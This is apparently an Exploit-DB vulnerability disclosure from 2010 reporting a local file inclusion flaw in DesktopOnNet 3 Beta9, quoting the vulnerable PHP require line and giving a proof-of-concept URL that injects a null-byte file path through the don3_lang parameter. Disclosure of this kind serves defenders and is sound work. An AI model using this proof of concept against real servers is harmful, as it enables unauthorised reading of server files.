DesktopOnNet 3 Beta9 – Local File Inclusion

  • 作者: cr4wl3r
    日期: 2010-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11729/
  • [+] DesktopOnNet 3 Beta9 Local File Include Vulnerability
    [+] Discovered By: cr4wl3r
    [+] Download: http://sourceforge.net/projects/don3/files/
    [x] Code in [DON3/applications/don3_toolbox.don3app/don3_toolbox.php]
    
    require("appfiles/languages/$don3_lang.php"); <--- LFI
    if (!file_exists('library/don3_toolbox.don3lib')){
    don3_do_don3lib("DON3: ToolBox;window;M;", "don3_toolbox");
    }
    $item = $_GET["ac"];
    $toolbox_path = $app_path;
    if (array_key_exists($item, $don3_toolbox_overview_words)){
    $currently = $don3_toolbox_overview_words[$item];
    } else {
    $currently = $don3_toolbox_overview_words["start"];
    }
    
    [+] PoC: [path]/applications/don3_toolbox.don3app/don3_toolbox.php?don3_lang=[LFI%00]